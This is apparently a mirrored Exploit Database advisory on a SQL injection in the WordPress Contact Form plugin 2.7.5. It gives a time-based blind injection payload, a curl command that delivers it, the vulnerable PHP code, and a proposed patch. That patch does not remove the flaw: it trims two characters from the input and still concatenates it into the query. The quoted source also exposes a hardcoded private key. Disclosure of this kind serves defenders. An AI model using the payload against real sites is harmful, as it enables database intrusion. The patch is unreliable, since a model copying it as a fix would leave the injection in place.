WordPress Plugin Contact Form 2.7.5 – SQL Injection

• Exploit Database
• 33 阅读

• 作者： Skraps
  日期： 2011-10-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17980/

• # Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
  # Date: 2011-10-13
  # Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
  # Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
  # Version: 2.7.5 (tested)
  
  ---------------
  PoC (POST data)
  ---------------
  http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php 
  wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)
   
  e.g.
  curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1
   
  ---------------
  Vulnerable code
  ---------------
  Line 49:
  public function the_content($content) {
  global $wpdb;
  global $table_name;
  global $settings_table_name;
  
  $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
  
  if ($_POST['wpcf_easyform_submitted'] == 1) {
  
  $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
  
  ---------------
  Patch
  ---------------
  
  *** ./easy-form.class.php.orig	2011-10-13 19:53:05.674800956 -0400
  --- ./easy-form.class.php	2011-10-13 19:51:21.442799615 -0400
  ***************
  *** 54,61 ****
  $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
  
  if ($_POST['wpcf_easyform_submitted'] == 1) {
  ! 
  ! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
  
  $continue = true;
  
  --- 54,63 ----
  $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
  
  if ($_POST['wpcf_easyform_submitted'] == 1) {
  !	$wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
  ! $wpcf_easyform_formid=substr($wpcf_easyform_formid,2); 
  ! 
  ! 	$form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);
  
  $continue = true;
  
  ***************
  *** 71,80 ****
  if ($continue) {
  
  //loop through the fields of this form (read from DB) and build the message here
  ! $form_fields = $wpdb->get_results("
  			SELECT *
  			FROM $settings_table_name
  ! 			WHERE form_id = ".$_POST['wpcf_easyform_formid']."
  			ORDER BY position
  		");
  		
  --- 73,82 ----
  if ($continue) {
  
  //loop through the fields of this form (read from DB) and build the message here
  ! 		$form_fields = $wpdb->get_results("
  			SELECT *
  			FROM $settings_table_name
  ! 			WHERE form_id = ".$wpcf_easyform_formid."
  			ORDER BY position
  		");